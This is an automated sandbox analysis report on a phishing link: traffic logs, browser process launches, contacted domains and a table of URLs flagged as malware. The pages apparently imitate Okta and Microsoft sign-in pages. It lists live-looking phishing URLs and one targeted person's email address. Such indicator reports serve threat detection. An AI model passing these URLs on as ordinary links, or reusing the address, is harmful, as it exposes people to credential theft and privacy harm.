Source: unknown	Network traffic detected: HTTP traffic on port 62911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62968
Source: unknown	Network traffic detected: HTTP traffic on port 62963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 62980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62960
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62975
Source: unknown	Network traffic detected: HTTP traffic on port 62985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62978
Source: unknown	Network traffic detected: HTTP traffic on port 62909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 62923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62987
Source: unknown	Network traffic detected: HTTP traffic on port 62940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62983
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62985
Source: unknown	Network traffic detected: HTTP traffic on port 62949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62918
Source: unknown	Network traffic detected: HTTP traffic on port 62955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62916
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62929
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62922
Source: unknown	Network traffic detected: HTTP traffic on port 62984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62923
Source: unknown	Network traffic detected: HTTP traffic on port 62915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62926
Source: unknown	Network traffic detected: HTTP traffic on port 62932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62927
Source: unknown	Network traffic detected: HTTP traffic on port 62967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62931
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62937
Source: unknown	Network traffic detected: HTTP traffic on port 62933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62938
Source: unknown	Network traffic detected: HTTP traffic on port 62966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 62944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62942
Source: unknown	Network traffic detected: HTTP traffic on port 62961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62946
Source: unknown	Network traffic detected: HTTP traffic on port 62938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62941
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61007
Source: unknown	Network traffic detected: HTTP traffic on port 62914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62909
Source: unknown	Network traffic detected: HTTP traffic on port 62959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62969 -> 443

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62987 version: TLS 1.2

Source: classification engine

Classification label: mal80.phis.win@19/102@36/20

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
18.245.31.78	d2vgu95hoyrpkh.cloudfront.net	United States	16509	AMAZON-02US	false
151.101.130.137	code.jquery.com	United States	54113	FASTLYUS	false
104.17.3.184	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
185.199.109.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
151.101.66.137	unknown	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
172.217.18.4	unknown	United States	15169	GOOGLEUS	false
13.33.187.68	d19d360lklgih4.cloudfront.net	United States	16509	AMAZON-02US	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false
104.26.9.44	ipapi.co	United States	13335	CLOUDFLARENETUS	false
104.21.90.167	s3irk.ativens.com	United States	13335	CLOUDFLARENETUS	false
3.227.135.8	httpbin.org	United States	14618	AMAZON-AESUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
162.241.62.33	itanhangasaude.com.br	United States	46606	UNIFIEDLAYER-AS-1US	false
188.114.96.3	nzd92.6gniu68.ru	European Union	13335	CLOUDFLARENETUS	true
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false
152.199.21.175	sni1gl.wpc.upsiloncdn.net	United States	15133	EDGECASTUS	false
104.17.2.184	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.6

Contacted Domains

Name	IP	Active
s3irk.ativens.com	104.21.90.167	true
a.nel.cloudflare.com	35.190.80.1	true
nzd92.6gniu68.ru	188.114.96.3	true
github.com	140.82.121.4	true
fp2e7a.wpc.phicdn.net	192.229.221.95	true
itanhangasaude.com.br	162.241.62.33	true
bg.microsoft.map.fastly.net	199.232.214.172	true
ipapi.co	104.26.9.44	true
vkwek.ckyucle.com	188.114.96.3	true
code.jquery.com	151.101.130.137	true
d2vgu95hoyrpkh.cloudfront.net	18.245.31.78	true
cdnjs.cloudflare.com	104.17.24.14	true
sni1gl.wpc.upsiloncdn.net	152.199.21.175	true
challenges.cloudflare.com	104.17.3.184	true
www.google.com	142.250.186.164	true
d19d360lklgih4.cloudfront.net	13.33.187.68	true
objects.githubusercontent.com	185.199.109.133	true
httpbin.org	3.227.135.8	true
cdn.socket.io	unknown	unknown
aadcdn.msauthimages.net	unknown	unknown
ok4static.oktacdn.com	unknown	unknown
www.itanhangasaude.com.br	unknown	unknown
206.23.85.13.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX	false	Avira URL Cloud: safe	unknown
https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130	true	Avira URL Cloud: malware	unknown
https://code.jquery.com/jquery-3.6.0.min.js	false	URL Reputation: safe	unknown
https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200	true	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb4	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180	true	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4W	false	Avira URL Cloud: safe	unknown
https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF	false	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	true		unknown
https://vkwek.ckyucle.com/2DUx/	true	Avira URL Cloud: malware	unknown
https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css	false	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106	true	Avira URL Cloud: malware	unknown
https://s3irk.ativens.com/RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40	false	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/favicon.ico	true	Avira URL Cloud: malware	unknown
https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/api.js	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2	true	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D	false	URL Reputation: safe	unknown
https://ipapi.co/8.46.123.33/json/	false	Avira URL Cloud: safe	unknown
https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69	true	Avira URL Cloud: malware	unknown
https://a.nel.cloudflare.com/report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72	true	Avira URL Cloud: malware	unknown
https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170	true	Avira URL Cloud: malware	unknown
https://httpbin.org/ip	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com	true		unknown
https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47	true	Avira URL Cloud: malware	unknown
https://cdn.socket.io/4.6.0/socket.io.min.js	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40	true	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	true		unknown
https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.com	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/xy12R7tzrssHzef25	true	Avira URL Cloud: malware	unknown
https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380	false	Avira URL Cloud: safe	unknown
https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag	true	Avira URL Cloud: malware	unknown
https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92	true	Avira URL Cloud: malware	unknown

Name	Type	MD5	SHA1	SHA256
Chrome Cache Entry: 100	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	547988BAC5584B4608466D761E16F370	C11BB71049702528402A31027F200184910A7E23	70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
Chrome Cache Entry: 101	ASCII text, with very long lines (51734)	0329C939FCA7C78756B94FBCD95E322B	7B5499B46660A0348CC2B22CAE927DCC3FDA8B20	0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
Chrome Cache Entry: 102	Web Open Font Format (Version 2), TrueType, length 43596, version 1.0	2A05E9E5572ABC320B2B7EA38A70DCC1	D5FA2A856D5632C2469E42436159375117EF3C35	3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
Chrome Cache Entry: 103	very short file (no magic)	CFCD208495D565EF66E7DFF9F98764DA	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
Chrome Cache Entry: 104	PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced	12BDACC832185D0367ECC23FD24C86CE	4422F316EB4D8C8D160312BB695FD1D944CBFF12	877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
Chrome Cache Entry: 105	Web Open Font Format, TrueType, length 35970, version 1.0	496B7BBDE91C7DC7CF9BBABBB3921DA8	2BD3C406A715AB52DAD84C803C55BF4A6E66A924	AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
Chrome Cache Entry: 106	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	839CB0F55C3D2D5C2F740BDA95CB2878	93F6FA3A2DA8B7184D4B5C5F2065872793370C2E	40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
